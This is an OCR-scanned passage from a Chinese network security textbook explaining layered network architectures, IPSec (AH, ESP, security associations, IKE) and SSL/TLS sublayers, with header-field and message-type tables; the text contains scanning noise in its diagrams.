的 七 层 OSI 体系 结构 (物理 层 、 链 路 层 、 网 络 层 、 传 输 层 、 会 话 层 、 表 示 层 、 应 用 层 )、TCP/IP 
的 四 层 体系 结构 (网 络 接口 层 、IP 层 、TCP 层 、 应 用 层 ) 。 还 有 一 些 教材 上 为 了 更 利于 知识 曾 
述 而 描述 的 五 层 体系 结构 (物理 层 、 链 路 层 、 网 络 层 .传输 层 .应 用 层 ) 。 不 同体 系 结构 的 对 应 
关系 如 图 8-1 所 示 。 


应 用 层 

表示 层 应 用 层 应 用 层 

会 话 层 
传输 层 | rcupp | 
和 网 络 层 人 IP 1 De 
= Rh) RR = 本 

物理 层 

OSI 体系 结构 TCP/IP 体 系 结构 五 层 体系 结构 


8-1 不 同 网 络 体系 结构 比较 图 
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对 于 计算 机 网 络 安全 这 门 学 科 而 言 ,研究 网 络 通信 的 安全 ,其 必然 要 依据 现 有 的 网 络 体 
系 结构 来 进行 。 在 本 节 中 将 按照 一 些 网 络 教 材 上 的 五 层 体系 结 构 来 前 述 。 当 然 ,在 部 分 ( 计 
算 机 网 络 ) 教 材 里 面 也 会 涉及 一 些 关 于 * 下 一 代 网 络 ? 的 问题 ,对 于 下 一 代 网 络 的 体系 结构 划 
分 会 有 些 不 同 的 方式 ,但 无 论 何 种 体系 结构 ,要 研究 网 络 通信 的 安全 问题 ,就 必然 要 在 网 络 
体系 的 各 个 部 分 里 面 考虑 可 行 的 安全 问题 解决 手段 。 也 就 是 说 ,要 依据 网 络 体系 结构 来 研 
究 网 络 安全 问题 。 

在 很 多 (计算 机 网 络 》 教 材 里 面 提 到 的 五 层 网 络 体系 结构 可 以 看 作 是 综合 了 OSI 与 
TCP/IP 体系 结构 来 对 网 络 协议 分 层 进 行 划分 的 。 此 种 划分 方式 既 与 现实 中 网 络 体系 结构 
贴近 ,又 利于 向 学 生 阐述 必要 说 明 的 各 个 层 。 

此 种 系统 结构 分 为 以 下 五 层 。 

(1) 物理 层 (physical layer) : 解决 网 络 通信 器 件 使 用 的 电气 、 物 理 规格 等 特性 。 例 如 ， 
用 什么 线 、 接 口 器 件 尺 寸 . 电 平 , 波 特 率 等 。 

(2) 数据 链 路 层 (data link layer) : 解决 在 电路 两 端 实现 端 到 端的 数据 帧 传输 问题 。 

(3) 网 络 层 (network layer) : 主要 功能 是 完成 网 络 中 主机 间 的 报 文 传输 。 在 广域网 中 ， 
这 包括 从 源 端 到 目的 端的 路 由 操作 。 网 络 层 主要 实现 了 网 络 的 异 构 互 联 。 

(4) 传输 层 (transport layer) : 主要 功能 是 完成 网 络 中 不 同 主机 上 的 用 户 进程 之 间 可 靠 
的 数据 通信 。 

(5) 应 用 层 (application layer) : 提供 远程 访问 和 资源 共享 ,包括 FTP、SMTP、HTTP、 
P2P 等 种 类 繁多 的 服务 。 很 多 其 他 应 用 程序 运行 在 此 层 。 

在 现在 的 网 络 中 ,这 五 层 上 都 视 为 存在 着 网 络 安全 考虑 一 一 只 是 程度 上 可 能 会 有 很 大 
不 同 ,甚至 有 些 弱 到 可 以 被 视 为 是 没有 安全 措施 。 例 如 ,在 物理 层 上 考虑 信号 的 尽量 远 距离 
无 差错 的 传输 ,这 可 以 视 为 是 为 了 保证 数据 完整 性 而 做 的 手段 。 某 些 数据 链 路 层 协议 则 能 
提供 较为 广泛 的 安全 手段 。 但 是 通常 情况 下 ,各 种 安全 手段 一 般 都 是 在 网 络 层 、 传 输 层 .应 
用 层 上 进行 的 ,这 是 网 络 安全 主要 关注 的 三 层 。 

在 这 些 层 上 的 安全 手段 很 重要 的 内 容 就 是 各 种 的 安全 协议 ,这些 安全 协议 将 是 接 下 来 
要 讨论 的 主要 内 容 。 在 网 络 层 上 将 介绍 IPSec 协议 ; 在 传输 层 上 将 介绍 SSL/TLS 协议 ; 
在 应 用 层 上 会 简单 介绍 几 种 安全 协议 ,如 图 8-2 所 示 。 


应 用 层 安全 协议 S-HTTP、S-MIME 、PGP 、SET…… 
传输 层 安全 协议 SSL/TLS 
网 络 层 安全 协议 IPSec 


图 8-2 ”不同 层 上 的 安全 协议 


8.1.2 IPSec 协议 


最 初 的 IP 协议 是 没有 任何 安全 措施 的 。IP 数据 报 含有 诸如 源 地 址 .目的 地 址 版 本 、 
长 度 、. 生 存 周期 ,承载 协议 、 承 载 数据 等 字段 。 虽 然 其 拥有 * 首 部 校 验 和 ”这 样 的 字段 来 提供 
极其 简单 的 完整 性 功能 ,不 仅 无 力 抵抗 对 数据 的 意外 或 者 故意 修改 ,也 无 力 抗拒 对 所 有 报头 
字段 的 恶意 修改 ,也 无 法 阻止 信息 泄露 等 问题 。 为 了 加 强 互联 网 的 安全 性 ,从 1995 年 开始 ， 
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IETF 着 手 制定 了 用 以 保护 IP 层 通 信 的 IPSec 协议 来 保证 本 层 的 安全 。IPSec 是 IPv6 的 组 
成 部 分 ,也 是 IPv4 的 可 选 扩 展 协议 。 

IPSec 协议 定义 了 一 种 标准 的 、 健 壮 的 及 包容 广泛 的 机 制 ,可 用 它 为 网 络 层 提供 安全 保 
证 。IPSec 能 为 IPv4 和 IPv6 提供 具有 互 操作 能 力 、 高 质量 和 基于 密码 的 安全 功能 ,在 IP 层 
实现 多 种 安全 服务 ,包括 访问 控制 .数据 完整 性 机密 性 等 。 

IPSec 协议 得 包括 两 个 用 于 数据 传输 的 安全 协议 : AH 协议 和 ESP 协议 。AH 协议 
(Authentication Header ,验证 头 协议 ) 可 以 证 明 数 据 的 起 源 地 ( 即 源 IP) 承载 数据 的 完整 性 
及 防止 相同 数据 包 在 因特网 重播 。ESP 协议 (Encapsulating Security Payload ,封装 安全 载 
荷 协 议 ) 具 有 AH 的 大 部 分 功能 ,还 可 以 利用 加 密 技 术 保障 数据 机 密 性 。 此 外 IPSec 还 选用 
IKE 协议 为 AH 和 ESP 协议 协商 安全 参数 ,建立 安全 关联 。 

在 介绍 具体 的 IPSec 子 协 议 之 前 首先 要 介绍 两 个 内 容 : IPSec 协议 的 两 种 实现 方式 和 
安全 关联 的 概念 。 

1. IPSec 的 实现 方式 

IPSec 协议 有 两 种 实现 方式 : 传输 模式 和 隧道 模式 。 

传输 模式 又 称 为 端 到 端 模 式 , 它 适用 于 两 台 主机 之 间 进 行 IPSec 通信 。 在 此 种 模式 中 ， 
参与 通信 的 两 台 计 算 机 都 必须 安装 IPSec 协议 。 

通过 传输 模式 进行 IPSec 通信 的 两 台 机 器 之 间 的 通信 和 处理 过 程 可 以 这 样 理解 : 在 发 送 
方 , 当 数据 包 到 达 网 络 层 处 理 时 ,先进 行 IPSec 处 理 , 并 在 数据 包 前 添加 IPSec 头 ; 然后 再 做 
普通 IP 处 理 ,并 添加 IP 头 。 在 接收 方 , 首 先进 行 普通 IP 处 理 , 然 后 再 做 IPSec 处 理 , 最 后 
将 承载 数据 交 给 上 层 协议 。 当 然 ,实际 上 IP 和 IPSec 的 一 些 处 理 不 是 分 开 而 是 相关 联 的 ， 
虽然 采用 此 种 模式 形成 的 IP 数据 包 的 形式 都 是 IP 头 在 前 ,然后 是 IPSec 头 ,后 面 是 承载 数 


据 , 如 图 8-3 所 示 。 
Ce 用 


传输 模式 


IP 头 ”| IPSec 头 | IP 承 载 数据 
传输 模式 的 数据 包 结 构 
8-3 IPSec 端 到 端 模式 示意 图 


而 隧道 模式 则 使 用 于 两 台 网 关 之 间 的 通信 。 参 与 通信 的 两 个 网 关 实际 是 为 两 个 以 其 为 
边界 的 网 络 中 的 计算 机 提供 安全 通信 的 服务 。 在 此 种 模式 中 ,需要 在 网 关上 安装 IPSec 协 
议 ,而 真正 需要 通信 的 计算 机 一 一 它们 都 处 在 以 两 个 网 关 为 边界 的 网 络 中 ,不 需要 安装 
IPSec 协议 。 

假定 计算 机 A、B 将 通过 网 关 G1、G2 进行 IPSec 隧道 模式 的 通信 ,其 中 A 是 信 源 。 使 
用 隧道 模式 进行 IPSec 通信 的 设备 进行 数据 处 理 的 过 程 可 以 这 样 理解 : 首先 ,A 生成 普通 
的 IP 数 据 包 , 这 个 数据 包 的 源 地 址 为 A. 目 的 地 址 为 B。 该 数据 包 将 被 交 给 A 的 网 关 G1 
来 处 理 。 在 网 关 G1 的 网 络 层 的 处 理 过 程 中 , 若 G1 发 现 该 数据 包 需 要 做 IPSec 处 理 ,那么 
它 会 将 整个 原始 的 IP 数据 包 作为 数据 放 到 一 个 新 的 数据 包 中 。 这 个 数据 包 要 先 做 IPSec 
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处 理 , 加 上 IPSec 头 ; 然后 再 做 普通 IP 处 理 , 加 上 一 个 源 地 址 为 G1、 目 的 地 址 为 G2 的 新 的 
普通 IP 头 。 这 个 由 G1 添加 的 IP 头 称 为 “外 部 IP 头 ”, 而 由 A 生成 的 IP 头 则 称 为 内 部 IP 
头 。 当 数据 包 到 达 G2 时 ,G2 将 进行 IP 和 IPSec 处 理 , 最 终 将 原始 的 源 地 址 为 A、 目 的 地 址 
为 了 B 的 数据 包 发 送 到 自己 所 在 网 络 ,该 包 将 由 计算 机 B 接收 。 在 这 个 过 程 中 计算 机 A、B 感 
觉 不 到 IPSec 的 存在 ,就 如 同 它们 用 普通 的 IP 协议 直接 正常 进行 通信 一 样 ,但 整个 通信 和 是 
有 安全 保障 的 ,如 图 8-4 所 示 。 


A B 
nee i ss 
Gl G2 
内 网 部 分 。 | 隧道 部 分 | 内 网 部 分 


外 部 IP 头 | IPSec 头 | 内 部 IP 头 | tp 承载 数据 
隧道 模式 的 数据 包 结构 
图 8-4 IPSec 隧道 模式 示意 图 


这 两 种 模式 在 实际 的 应 用 中 有 各 自 的 用 途 , 可 以 参考 图 8-5 来 进一步 认识 。 这 里 假设 
的 是 一 家 跨国 公司 使 用 的 运行 IPSec 的 网 络 。 在 总 公司 和 各 个 分 支 机 构 的 网 关上 布置 
IPSec ,一些 需 要 出 差 的 员工 使 用 安装 有 IPSec 的 笔记 本 电脑 。 公 司 内 不 同 分 支 机 构 的 机 器 
之 间 可 以 通过 隧道 模式 进行 通信 ,外 出 人 员 使 用 的 计算 机 之 间 及 它们 与 公司 内 部 网 络 中 计 
算 机 可 以 选择 使 用 隧道 模式 或 传输 模式 进行 通信 (图 8-6)。 这 个 例子 实际 上 可 以 视 为 是 一 
个 公司 运行 的 基于 IPSec 的 内 联网 VPN ,关于 VPN 会 在 稍 后 的 章节 中 做 更 多 的 介绍 ,这 里 
只 是 顺便 先 给 大 家 一 个 基本 的 认识 和 了 解 。 


IA 网 关上 | 

| 二 Ee 
1 
1 
1 


图 8-5 IPSec 的 应 用 实施 


2. 安全 关联 及 其 建立 
安全 关联 (Security Association,SA) 是 IPSec 的 重要 概念 。 后 面 介 绍 AH 协议 和 ESP 
协议 的 时 候 大 家 会 看 到 ,这 些 协 议 运行 的 时 候 需 要 消息 验证 Hash 算法 和 对 称 密 钥 加 密 算 
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图 8-6 IPSec 应 用 实施 中 的 不 同 模式 


法 ,而 采用 何 种 算法 、 密 钥 ,在 进行 通信 开始 之 前 都 是 需要 明确 的 。 这 些 IPSec 通信 所 必需 
的 参数 是 安全 关联 要 有 的 数据 内 容 , 存 储 这 些 数据 的 数据 结构 将 会 以 安全 参数 索引 
(Security Parameters Index,SPI) 来 标定 。 给 定 一 个 安全 关联 ,除了 能 决定 SPI 之 外 ,还 能 
决定 通信 的 目的 IP 和 使 用 何 种 协议 (AH 还 是 ESP); 反之 ,给 出 这 三 项 数据 也 可 以 唯一 决 
定 一 个 安全 关联 。 

另外 要 注意 ,安全 关联 是 发 送 者 到 接收 者 之 间 的 一 个 标识 安全 连接 的 单 向 关系 。 唯 一 
决定 它 的 3 个 因素 中 有 一 个 是 “目的 IP”。 虽 然 , 同 一 个 安全 关联 的 相关 数据 在 参与 通信 的 

台 设 备 上 都 需要 存储 ,但 参与 对 等 通信 的 两 台 设 备 上 各 自 需 要 一 对 安全 关联 才能 满足 两 
者 间 最 基本 的 双向 IPSec 通信 。 

安全 关联 存储 着 保证 IPSec 通信 的 关键 数据 ,为 了 保障 安全 ,通信 参与 者 在 协商 和 交换 
这 些 数据 时 需要 有 安全 的 渠道 。 换 句 话 说 ,有 了 安全 关联 ,IPSec 可 以 提供 安全 的 数据 交换 
了 ,但 谁 来 保证 建立 安全 关联 时 所 必需 的 数据 安全 通信 呢 ? 

IPSec 协议 采用 了 一 个 现成 的 IKE 协议 来 建立 安全 关联 。 

IKE 协议 是 互联 网 工程 任务 组 (Internet Engineering Task Force,IETF) 定 义 的 一 种 由 
ISAKMP、Oakley 和 SKEME 组 成 的 专 供 交 换 安 全 关联 这 类 敏感 数据 的 协议 。 其 中 ， 
Oakley 协议 采用 了 Diffie-Hellman 密 钥 交换 算法 保证 了 信息 的 安全 交换 ,IKE 协议 的 运行 
首先 使 用 Oakley 协议 建立 一 个 “安全 关联 的 安全 关联 ”。 然 后 通过 SKEME 协议 完成 安全 
关联 本 身 需 要 数据 的 协商 与 交换 。 所 有 数据 都 在 ISAKMP(Internet Security Association 
and Key Management Protocol) 协 议 规定 的 框架 下 进行 交换 。 

关于 IKE 协议 这 里 不 再 做 更 多 介绍 ,有 兴趣 的 同学 可 以 查询 相关 资料 。 

3. AH 协议 

IPSec 的 子 协 议 头 认证 协议 AH ,为 IP 报 文 提 供 数据 完整 性 校 验 和 身份 验证 ,还 具备 防 
重 放 攻击 能 力 。 不 过 AH 协议 不 对 受 其 保护 的 IP 数据 报 的 任何 部 分 进行 加 密 。AH 的 协 
议 分 配 号 为 51。 

AH 协议 头 (图 8-7) 主 要 包含 以 下 字段 。 
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0 党 15 31 
下 一 报头 载荷 长 度 保留 
安全 参数 索引 
序列 号 
验证 数据 


图 8-7 AH 数据 包 格 式 


(1) 下 一 报头 (8 位 ): 这 个 报头 之 后 的 报头 类 型 。 

(2) 载荷 长 度 (8 位 ): 以 32 位 为 单位 的 AH 头 长 度 减 2。 例 如 , 若 身份 验证 数据 为 96 
位 ,AH 头 将 一 共 6 个 32 位 字 , 则 该 段 数值 为 6 一 2 一 4。 

(3) 保留 (16 位 ): 供 将 来 使 用 ,目前 协议 规定 这 个 字段 应 该 被 置 为 0。 

(4) 安全 参数 索引 (SPI,32 位 ): 联合 协议 类 型 .目的 IP 决定 数据 包 属 于 哪个 SA ,以 决 
定 如 何 处 理 。 

(5) 序列 号 (32 位 ) : 一 个 单调 递增 的 计数 器 值 。 

(6) 验证 数据 : 存放 可 实现 对 整个 数据 包 的 完整 性 检查 的 消息 验证 码 ,如 可 以 采用 
HMAC-MD5-96、HMAC-SHA-1-96 之 类 的 算法 计算 出 整个 IP 数据 包 的 消息 验证 码 存放 
于 此 字段 , 供 信 宿 端 验证 。 如 何 处 理由 安全 关联 决定 。 长 度 可 变 , 取 决 于 采用 何 种 消息 验证 
算法 。 

AH 协议 通过 设置 的 验证 数据 字段 实现 对 数据 和 其 来 源 完整 性 的 验证 。 当 接收 端 进 
行 AH 处 理 时 可 以 通过 计算 消息 验证 码 来 验证 整个 数据 包 是 否 被 修改 过 。 这 意味 着 除 
了 能 保证 载荷 数据 的 完整 之 外 ,也 保证 了 源 IP 地 址 的 正确 ,从 而 确定 数据 包 的 数据 与 来 
源 完 整 性 。 

AH 协议 通过 序列 号 字段 实现 防止 重播 的 功能 。 此 种 功能 的 开启 需要 使 用 者 选择 是 否 
启用 抗 重 放 功 能 。 如 果 该 功能 不 启用 ,协议 处 理 程序 对 序列 号 字段 不 予 理 会 。 若 开启 抗 重 
放 功 能 则 信 宿 端 将 通过 设置 接受 窗口 和 标记 已 接收 数据 包 这 些 类 似 TCP 协议 处 理 的 功能 
进行 是 否 重播 检查 ,并 且 会 丢弃 重播 的 数据 包 。 另 外 ,如 果 采 用 了 抗 重 放 处 理 ,序号 将 从 0 
开始 ,单调 递增 ,但 不 会 从 2” 一 1 循环 到 0。 当 序号 达到 2” 一 1 的 时 候 , 相 应 的 安全 关联 将 
被 终止 ,如 果 还 需要 继续 通信 和 则 需要 重新 建立 安全 关联 。 

4. ESP 协议 


ESP 为 IP 报 文 提供 数据 完整 性 校 验 、 身 份 验 证 ,数据 加 密 及 重 放 攻击 保护 。 也 就 是 说 ， 
除了 AH 协议 提供 的 大 部 分 功能 以 外 .ESP 协议 还 提供 对 载荷 数据 的 机 密 性 服务 。ESP 协 
议 的 分 配 号 为 50。 

ESP 头 (图 8-8) 主 要 包含 以 下 字段 。 

(1) 安全 参数 索引 (SPI,32 位 ): 联合 协议 类 型 .目的 IP 决定 属于 哪个 SA ,以 决定 如 何 
处 理 。 

(2) 序列 号 (32 位 ) : 单调 递增 的 计数 器 值 。 

(3) 加 密 数 据 载荷 : 加 密 内 容 包含 原来 IP 数据 包 的 有 效 载荷 和 填充 数据 。 可 以 选取 不 
同 的 加 密 算 法 ,如 DES .3-DES 、RC5 .IDEA 等 。 

(4) 填充 项 : 长 度 可 以 是 0 一 255 字 节 。 保 证 加 密 数 据 的 长 度 适应 分 组 加 密 算法 的 长 
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验证 数据 


图 8-8 ESP 数据 包 格 式 


度 , 如 64 位 的 整数 倍 。 也 可 以 用 以 掩盖 载荷 的 真实 长 度 对 抗 流量 分 析 。 

(5) 下 一 报头 : 这 个 报头 之 后 的 报头 类 型 。 

(6) 验证 数据 : 采用 验证 算法 计算 出 来 的 消息 验证 码 , 如 计算 处 理由 SA 决定 ,字段 长 
度 取决 于 SA 规定 的 算法 。 不 同 于 AH 协议 ,该 字段 是 可 选 的 ,就 是 说 用 户 可 以 根据 自己 的 
需要 而 不 使 用 ESP 协议 的 验证 功能 。 

ESP 协议 能 够 实现 AH 的 防 重 播 功能 和 验证 功能 ,此 外 还 提供 对 载荷 数据 的 加 密 功 
能 ,具有 更 强大 的 功能 。 

通过 前 面 的 内 容 大 家 了 解 到 AH 协议 和 ESP 协议 有 不 同 的 功能 。 在 很 多 情况 下 ,AH 
功能 已 经 能 够 满足 安全 的 需要 了 。ESP 由 于 需要 使 用 高 强度 的 加 密 算法 ,需要 消耗 更 多 的 
计算 机 运算 资源 ,使 用 上 受到 一 定 限制 。 

在 IPSec 协议 簇 中 使 用 两 种 功能 不 同 的 协议 使 得 IPSec 具有 对 网 络 安全 细 粒 度 的 功能 
选择 ,便于 用 户 依 据 自 己 的 安全 需要 对 网 络 进 行 灵活 配置 。 


8.1.3 SSL/TLS 协议 


传输 层 是 网 络 体 系 结构 中 任务 最 为 重要 和 复杂 的 一 层 ,该 层 完 成 面向 连接 、 流 量 及 拥塞 
控制 的 任务 。TCP 协议 保证 了 网 络 上 的 通信 和 是 满足 无 重复 、 无 丢 包 ,以 适宜 流量 进行 的 
通信 。 

作为 传输 层 上 最 重要 的 核心 协议 ,TCP 包头 上 包含 有 源 端 口 、 目 的 端口 、 序 号、 确认 序 
号 .窗口 等 字段 和 URG 紧急 .ACK 确认 、PSH 推送 .SYN 同步 .RST 复位 ,FIN 终止 等 比 
特 , 有 针对 整个 数据 包 的 校 验 和 。TCP 协议 提供 了 应 用 程序 间 的 有 连接 通信 ,但 不 保证 通 
信 的 对 象 究竟 是 谁 , 无 法 保证 通信 的 保密 性 ,无 法 对 获得 的 信息 进行 认证 ,无 法 对 抗 恶意 修 
改 。 在 实际 应 用 中 ,除了 可 以 通过 其 下 网 络 层 上 的 IPSec 协议 来 实现 某 些 安全 功能 外 ,也 可 
以 使 用 人 们 专门 开发 的 传输 层 之 上 运行 的 安全 套 接 层 协议 : SSL/TLS。 

SSL/TLS 协议 的 历史 可 以 追溯 到 1994 年 。 这 年 Netscape 开发 了 在 公司 内 部 使 用 的 
安全 套 接 层 协议 SSL 1. 0(Secure Socket Layer) ,专门 用 于 保护 Web 通信 。 到 1996 年 发 布 
了 较为 完善 的 SSL 3. 0。1997 年 IETF 以 其 为 基础 发 布 了 传输 层 安 全 协议 TLS 1.0 
(Transport Layer Security) ,该 协议 兼容 SSL 3. 0, 也 被 称 为 SSL 3. 1。 同 时 ,Microsoft 宣 
布 与 Netscape 一 起 支持 TLS 1.0。1999 年 ,RFC 2246 正式 发 布 ,也 就 是 TLS 1.0 的 正式 
版 本 。 
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SSL 实际 位 于 传输 层 之 上 、 应 用 层 之 下 (图 8-9) 。 该 协议 与 


应 用 层 无 关 , 能 为 各 种 应 用 层 协议 提供 透明 的 安全 服务 ,保证 两 ppPRKRTTRz 
个 应 用 之 间 通 信 的 保密 性 和 可 靠 性 。 目 前 广泛 应 用 于 以 各 种 安 py 
全 应 用 领域 。 
SSL 提供 的 服务 可 以 归结 为 以 下 3 个 方面 。 图 8-9 SSL 在 协议 栈 中 
(1) 用 户 和 服务 器 的 合法 性 认证 。SSL 协议 在 建立 会 话 时 位 置 示意 图 


可 以 验证 通信 参与 者 的 数字 证 书 。 从 而 保证 通信 参与 者 能 与 正 
确 的 对 象 进行 通信 ,并 将 数据 发 送 到 正确 的 机 器 上 。 

(2) 数据 完整 性 保障 。SSL 协议 采用 消息 验证 码 来 验证 获取 数据 的 完整 性 ,确保 信息 
内 容 和 来 源 的 完整 性 。 

(3) 数据 机 密 性 保证 。SSL 协议 采用 加 密 算法 来 加 密 数 据 , 保 障 数据 的 机 密 性 。 

SSL 协议 本 身 也 分 为 两 层 。 低 层 是 SSL 记录 协议 层 ,包含 SSL 记录 协议 ; 高 层 是 SSL 
握手 协议 层 ,该 层 上 有 SSL 握手 协议 、SSL 警告 协议 、SSL 更 改 密码 规则 协议 ,如 图 8-10 
所 示 。 


SSL 握 手 协议 | SSL 更 改 密码 规则 协议 | SSL 警 告 协议 
SSL 记 录 协 议 
TCP 
IP 


图 8-10 ”SSL 协议 的 两 层 


SSL 协议 的 工作 过 程 可 以 这 样 简单 描述 : 首先 通信 双方 使 用 SSL 握手 协议 建立 SSL 
会 话 ,商议 好 加 密 算法 、. 密 钥 ,数据 压缩 方式 之 类 的 通信 安全 参数 ,该 过 程 中 可 能 需要 通过 数 
字 证 书 验证 对 方 身 份 。 需 要 传输 数据 时 则 选择 会 话 下 恰当 的 连接 ,如 果 没 有 ,就 建立 新 的 连 
接 。 传 输 数据 时 要 对 信息 进行 对 称 密 钥 加 密 , 并 计算 Hash 消息 验证 码 供 对 方 验 证 。 由 于 
对 称 密 钥 加 密 要 消耗 一 定量 的 计算 资源 ,SSL 协议 一 般 先 要 按照 建立 会 话 时 商定 的 压缩 方 
法 将 数据 压缩 后 再 做 加 密 处 理 。 收 到 信息 后 则 要 依次 做 完整 性 验证 .解密 、 解 压缩 的 操作 ， 
最 终 将 数据 传送 给 应 用 层 。 

1. 会 话 与 连接 

在 进一步 解释 SSL 协议 两 层 中 各 自 协议 之 前 ,首先 来 看 看 SSL 协议 中 会 话 与 连接 的 


概念 。 
SSL 会 话 由 握手 协议 创建 。SSL 会 话 定 义 了 一 系列 相应 的 安全 参数 ,最 终 建立 客户 机 
和 服务 器 之 间 的 一 个 关联 。 对 于 实际 上 为 应 用 提供 服务 的 每 个 SSL 连接 ,可 利用 SSL 会 话 
避免 对 新 的 安全 参数 进行 复杂 而 代码 繁多 的 协商 。 

每 个 SSL 会 话 都 有 许多 与 之 相关 的 状态 。SSL 会 话 状态 参数 包括 以 下 几 种 。 

(1) 会 话 标志 符 (session identifier) : 用 来 确定 活动 或 可 恢复 的 会 话 状态 。 

(2) 对 等 实体 证 书 (peer certificate) : 存放 对 等 实体 的 X. 509 v3 数字 证 书 。 

(3) 压缩 方法 (compression method): 规定 加 密 之 前 用 何 种 压缩 方法 对 数据 进行 
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(4) 加 密 规范 (cipher spec) : 指明 采取 何 种 加 密 算 法 ,如 DES.3DES IDEA 等 ; 采用 何 
种 消息 摘要 算法 ,如 MD5 和 SHA-1 等 ; 以 及 选择 加 密 算法 的 各 种 相关 参数 。 

(5) 主 密码 (master secret) : 由 客户 机 和 服务 器 共享 的 密码 。 

(6) 是 否 可 恢复 (is resumable) : 会 话 是 否 可 用 于 初始 化 新 连接 的 标志 。 

而 SSL 连接 则 是 一 个 用 于 交换 数据 的 双向 连接 。 每 个 连接 都 属于 一 个 SSL 会 话 , 一 个 
SSL 会 话 中 可 以 建立 多 个 SSL 连接 。SSL 连接 成 功 后 ,就 可 以 进行 安全 保密 通信 了 。 

SSL 连接 状态 的 参数 包括 以 下 7 个 。 

(1) 服务 器 和 客户 机 随机 数 (server and client random) : SSL 服务 器 和 客户 端 为 每 一 
个 连接 所 随机 选择 的 字 节 序列 。 

(2) 服务 器 写 MAC 秘密 (server write MAC secret) : 用 来 记录 对 服务 器 端 送出 的 数据 
进行 消息 验证 码 计 算 操 作 时 所 用 的 密 钥 。 

(3) 客户 机 写 MAC 秘密 (client write MAC secret) : 用 来 记录 对 客户 端 送出 的 数据 进 
行 消息 验证 码 计算 操作 时 所 使 用 的 密 钥 。 

(4) 服务 器 写 密 钥 (server write key): 用 于 记录 服务 器 端 进行 数据 加 密 , 即 客户 端 进行 
数据 解密 的 对 称 加 密 算法 使 用 的 密 钥 。 

(5) 客户 机 写 密 钥 (client write key) : 用 于 记录 客户 端 进行 数据 加 密 , 即 服务 器 端 进行 
数据 解密 的 对 称 加 密 算法 使 用 的 密 钥 。 

(6) 初始 化 向 量 (initialization vectors) : 当 数 据 加 密 采用 CBC 方式 时 ,每 一 个 密 钥 保 持 
一 个 IV。 该 字段 首先 由 SSL Handshake Protocol, 以 后 保留 每 次 最 后 的 密 文 数据 块 作 
为 IV。 

(7) 序列 号 (sequence number): 每 一 方 为 每 一 个 连接 的 数据 发 送 与 接收 维护 单独 的 顺 
序号 。 当 一 方 发 送 或 接收 一 个 改变 的 cipher spec message 时 ,序号 置 为 0, 最 大 2% 一 1。 

2. SSL 记录 协议 


在 SSL 协议 中 所 有 要 传输 的 数据 都 被 封装 在 SSL 记录 协议 的 数据 封包 中 。 和 其 他 的 
各 种 常见 协议 类 似 ,SSL 记录 协议 的 数据 包 由 记录 头 和 长 度 不 为 零 的 记录 数据 组 成 ,如 
图 8-11 所 示 。 


消息 类 型 | 主 版 本 | 次 版 本 数据 长 度 


消息 验证 码 


图 8-11 SSL 记录 协议 的 格式 


SSL 的 所 有 通信 ,包括 普通 的 交换 数据 ,SSL 握手 协议 .SSL 警告 协议 ,SSL 更 改 密码 
规则 协议 的 数据 包 ,都 要 放置 于 SSL 记录 协议 的 记录 数据 中 传输 。 

SSL 记录 协议 包含 的 字段 有 以 下 几 种 。 

(1) 信息 类 型 : 指 封装 在 数据 段 中 的 信息 类 型 ,有 四 种 类 型 , 即 数据 .SSL 握手 、SSL 警 
告 .SSL 交换 密码 规范 。 
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(2) 版 本 号 : 使 用 的 SSL 协议 版 本 号 ,包括 主 版 本 号 和 次 版 本 号 。 

(3) 数据 长 度 : 以 字 节 表示 的 数据 字段 长 度 , 最 大 为 2* 字 节 。 

(4) 数据 : 此 部 分 存放 的 内 容 包 括 上 层 协议 (包括 SSL 握手 层 ) 送 来 的 数据 .填充 数据 
及 它们 的 消息 验证 码 。 数 据 可 能 被 压缩 和 加 密 。 

(5) 消息 验证 码 : SSL 数据 部 分 的 消息 验证 码 。 

3. SSL 握手 协议 

SSL 握手 协议 是 用 来 建立 会 话 和 连接 的 协议 ,如 图 8-12 所 示 。 


握手 消息 格式 | 消息 类 型 | 消息 长 度 消息 内 容 


一 1 


天 疡 1 


ClientHello 格 式 | 版 本 号 | 随机 数 | 会 话 ID | 加 密 选项 表 | 压缩 算法 列表 


ServerHlello 格 式 | 版 本 号 | 随机 数 | 会 话 ID | 。 密码 组 压缩 算法 


CertificateRequest 格 式 证 书 类 型 列表 证 书 认证 中 心 (CA) 列 表 


图 8-12 SSL 握手 协议 及 一 些 握手 消息 格式 
该 协议 的 消息 有 以 下 3 个 字段 。 
(1) 消息 类 型 (1 字 节 ): 表示 该 消息 的 类 型 ,SSL 握手 协议 中 有 10 种 消息 类 型 。 消 息 
类 型 如 表 8-1 所 示 。 
(2) 消息 长 度 (3 字 节 ): 消息 以 字 节 为 单位 的 长 度 。 
(3) 消息 内 容 : 各 种 与 该 消息 有 关 的 参数 。 
表 8-1 SSL 握手 协议 的 消息 类 型 


类 型 编号 消息 类 型 说 上 明 
0 HelloRequest 服务 器 一 客户 端 
| ClientHello 客户 端 一 服务 器 
2 ServerHello 服务 器 一 客户 端 
11 Certificate 双向 ; 传送 X. 509 证 书 
12 ServerKeyExchange 服务 器 一 客户 端 
所 CertificateRequest 服务 器 一 客户 端 
14 ServerHelloDone 服务 器 一 客户 端 
15 CertificateVerify 客户 端 一 服务 器 
16 ClientkeyExchange 客户 端 一 服务 器 
20 Finished 双向 
4. SSL 警告 协议 
警告 协议 用 来 为 对 等 实体 之 间 传递 SSL 警告 ,如 图 8-13 所 示 。 该 协议 的 每 个 消息 有 两 
个 他 入 is 


警告 级 别 警告 代码 


第 一 个 字 节 为 警告 级 别 , 它 只 有 两 个 取 值 : 1 代表 警告 .2 
代表 错误 。 该 字 节 表示 警告 的 严重 性 ,如 果 是 错误 级 别 ,SSL 图 8-13 SSL 警告 协议 格式 
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协议 处 理 程序 将 立即 终止 连接 ; 同一 会 话 中 的 其 他 连接 虽然 可 以 继续 使 用 ,但 会 话 将 不 再 
产生 新 连接 。 如 果 是 警告 级 别 ,SSL 协议 处 理 程 序 将 按照 不 同 的 警告 代码 来 决定 如 何 做 后 
续 处 理 。 
第 二 个 字 节 为 警告 代码 , 它 代表 了 具体 是 何 种 警告 或 错误 ,作为 SSL 协议 处 理 的 依据 。 
表 8-2 列 出 了 部 分 警告 代码 的 含义 。 
表 8-2 部 分 SSL 警告 代码 


取 值 警 告 含 义 
0 Close_notify 关闭 连接 通知 
10 Unexpected_message 不 期 望 的 消息 
20 Bad_record_mac 错误 的 消息 认证 码 
21 Decryption_failed 解密 失败 
路 Record_overflow 记录 溢出 
30 Decompressing_failure 解压 缩 失败 
40 Handshake_failure 握手 失败 
41 No_certificate 没有 证 书 
42 Bad_certificate 错误 的 证 书 
